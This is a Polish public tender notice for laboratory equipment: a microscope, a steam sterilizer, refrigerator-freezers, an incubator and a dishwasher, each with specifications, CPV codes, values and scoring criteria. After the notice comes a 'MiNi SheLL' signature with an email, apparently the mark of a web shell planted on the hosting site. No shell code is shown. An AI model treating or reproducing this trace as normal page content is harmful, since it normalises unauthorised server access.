20x / apertura 0,45, planachromat, odl. robocza 0,46 mmo	40x / apertura 0,75, semiplanapochromat, kontrast Nomarskiego/DIC, odl. robocza 0,17 mmo	100x / apertura 1,30, semiplanapochromat, immersja olejowa, kontrast Nomarskiego/DIC, odl. robocza 0,20 mm	Stolik	o	Posuw preparatu w osiach X i Y (ukryte prowadnice)o	Regulowana siła obrotu pokręteł w osiach X i YKondensor	o	Kondensor N.A. 0,9 z regulowaną przysłoną aperturową, do obserwacji z obiektywami 2,5x ... 100x, w pełni centrowalny, wyposażony do kontrastu fazowego, ciemnego pola i kontrastu Nomarskiego/DICKamera cyfrowa kolorowa	o	Rozdzielczość co najmniej: 2560 (H) x 1920 (V) = 5 Megapikselio	Digitalizacja: 3 x 8 bitówo	Czas integracji: od 0,1 ms do 2 so	Interface: USB 3.0o	Oprogramowanie do akwizycji obrazu zapewniające obróbkę obrazu i podstawowe pomiaryWyposażenie	o	Zestaw ochronny antystatyczny (pokrowiec, osłony gumowe na okulary oraz źródło światła)o	Zestaw narzędziGwarancja minimum	o	12 miesięcy<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>38510000-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 48856,79<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-08-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">25,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">udzielona gwarancja </td><td style="border: 1px solid black;border-collapse: collapse;">15,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>jeden sterylizator parowy pionowy </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Warunki techniczne i wyposażenie:	Wymagania:Stan sterylizatora/ rok produkcji	Fabrycznie nowy, rok produkcji 2019Sterylizator z komorą sterylizacyjną pionową TakPojemność użytkowa komory 80 litrów ?5%	TakŚrednica komory: > 410 mm - 10 pkt.< 410 mm - 0 pkt.	TakRama i obudowa wykonane ze stali nierdzewnej nie gorszej niż 304 wg. AISI	TakObudowa drzwi sterylizatora bez wystających elementów	TakSterylizator wyposażony w skrętne kółka z blokadami szt. 4	TakKomora, płaszcz komory, drzwi komory, wytwornica pary wykonane ze stali nierdzewnej nie gorszej niż 316 L wg. AISI	TakTemperatura sterylizacji programowana w zakresie 103-136 °C	TakRegulacja temperatury w zakresie całkowitym 60-136 °C	TakFunkcja aparatu Kocha (100°C) oraz funkcja upłynniania agaru (60°C) TakCiśnieniowa wbudowana wytwornica pary wykonana ze stali nierdzewnej 316L wg AISI. Wytwornica oddzielona od komory sterylizacyjnej	TakWbudowany dodatkowy czujnik temperatury w komorze ( sonda giętka) PT100	TakZamykanie pokrywy zamkiem napędzanym silnikiem elektrycznym. W zamku blokada temperaturowa	TakWspomaganie otwierania drzwi sterylizatora za pomocą sprężyny gazowej, drzwi otwierane do pionu TakUszczelka rozprężana parą	TakAutomatyczne czyszczenie wytwornicy pary na koniec każdego cyklu TakSterowanie mikroprocesorowe	TakWszystkie komunikaty na wyświetlaczu w języku polskim	TakWbudowana pompa próżniowa, dostępne próżnia frakcjonowana i suszenie próżniowe	TakWyświetlanie komunikatów o zaistniałych awariach	TakRozwiązania gwarantujące dostęp do ustawień sterylizatora według stopnia kompetencji personelu	TakW pełni automatyczna realizacja wszystkich programów sterylizacyjnych.	TakProgramy sterylizacyjne - min. 18 programów	TakProgramy sterylizacyjne z możliwością zmiany parametrów	TakDostęp do menu zmiany programów zabezpieczony kodem	TakSystem chłodzenia zrzutu kondensatu do wartości bezpiecznej dla instalacji kanalizacyjnej	TakMożliwość dokonywania zmian w ustawieniach parametrów sterylizacji przez użytkownika	TakWłącznik czasowy cyklu ( program uruchamia się po wcześniejszym ustawieniu daty i godziny startu ) TakMożliwość wbudowana drukarki parametrów sterylizacji z wydrukiem na zwykłym papierze (trwałe wydruki)	TakKomora wyposażona w port walidacyjny	TakStacja odwróconej osmozy do zasilania wytwornicy pary	TakZasilanie elektryczne min.: 6 kW/400V	TakKosz sterylizacyjny wykonany z siatki nierdzewnej na  1/2  załadunku komory szt. 1, Kosz pełny ze stali nierdzewnej na  1/2  załadunku szt. 1	TakŚrednie zużycie wody demineralizowanej na cykl max: 4 l	TakZużycie wody chłodzącej do chłodzenia kondensatu max.10 l wody wodociągowej zdatnej do picia.	TakGwarancja i serwis.:	Gwarancja minimum 12 miesięcy	TakKoszt przeglądów serwisowych (min. 1 x w roku) w trakcie gwarancji	PodaćKoszt materiałów zużywalnych w trakcie gwarancji	PodaćKoszt dojazdu serwisanta	Podać<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33191100-6, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 37284,00<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-08-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">25,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Idzielona gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">15,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>dwie chłodziarko - zamrażarki laboratoryjne i jedna cieplarka laboratoryjna </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Warunki techniczne i wyposażenie:	Wymagania:Stan chłodziarko - zamrażarek Fabrycznie nowe, rok produkcji 2019Wymiary zewnętrzne (wys. x szer. x gł.) mm	1870x600x600Wymiary wewnętrzne (wys. x szer. x gł.) mm	Chłodziarka: 805x510x430,Zamrażarka: 780x463x445Pojemność brutto (chłodziarka/zamrażarka), L	324 (190/134)Pojemność netto, L	302Wykończenie zewnętrzne BiałeKolor	Biały/zielonyWykończenie wnętrza	TworzywoTyp tworzywa	SRL800 (HIPS/ABS mix)Typ drzwi Pełne, przestawneCzujnik otwartych drzwi	TakZamek	TakRegulowane nóżki	2 przednie, 2 tylne rolkiZakres temperatury °C Chłodziarka: +2 do +8zamrażarka: -18 do -25Wyświetlacz temperatury na panelu	TakAlarm temperatury	TakLiczba półek	3Formowane szuflady	2Regulowane pojemniki na drzwiach	2 pełne, 4 półkoweŚwiatło wewnętrzne	WskazaneRozmrażanie	Chłodziarka: automatyczneZamrażarka: ręczneCzynnik chłodzący	R600aWolny od CFC, HFC, HCFC	TakNapięcie, V	230Typ izolacji	CyklopentanGrubość izolacji, mm	60Regulacja temperatury	Z dokładnością do 0,1°CGwarancja minimum	12 miesięcy.Warunki techniczne i wyposażenie:	Wymagania:Stan cieplarki	Fabrycznie nowa, rok produkcji 2019Wymiary zewnętrzne (wys. x szer. x gł.) mm	2020x520x700Pojemność brutto	350Pojemność netto	335Kolor	Basic/Basic+/INOX/INOX+Ilość półek	3Zakres temperatur	+3°C do +40°CNapięcie zasilania 230V / 50HzMoc znamionowa 280Masa (kg)	100-105Drzwi	Pełne z samozamykaczem i zamkiemObieg powietrza	wymuszonyJednorodność oraz stabilność temperatury	+/- 0,7°CRegulacja temperatury	Co 0,1°C za pomocą sterownika mikroprocesorowegoAlarm uszkodzenia czujnika temperatury	TakOświetlenia wnętrza świetlówką WskazaneGwarancja minimum	12 miesięcy<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39711110-3, 38000000-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 18400,00<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-08-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">25,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Udzielona gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">15,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>jedna zmywarka do naczyń z funkcją wyparzania </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Warunki techniczne i wyposażenie:	Wymagania:Stan zmywarki	Fabrycznie nowa, rok produkcji 2019Wymiary zewnętrzne (wys. x szer. x gł.) mm	836x565x636Napięcie - U	400VMoc elektryczna	6.5 kWFunkcja wyparzania	TakSterowanie elektroniczne	TakFiltr powierzchniowy	TakPrzystosowana do mycia tac GN 1/1	TakJelitowy dozownik płynu myjącego i nabłyszczającego	TakCzas trwania cyklu	90/120/180 sek.Wskaźnik temperatury pracy bojlera i komory	Tak2 pary ramion myjąco-płuczących (góra/dół)	TakZużycie wody 2,5 l/cyklMaksymalna wysokość mytego naczynia	320 mmKosz 500x500 mm	TakGwarancja minimum	12 miesięcy<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39713100-4, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 5040,65<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-08-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">25,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Udzielona gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">15,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com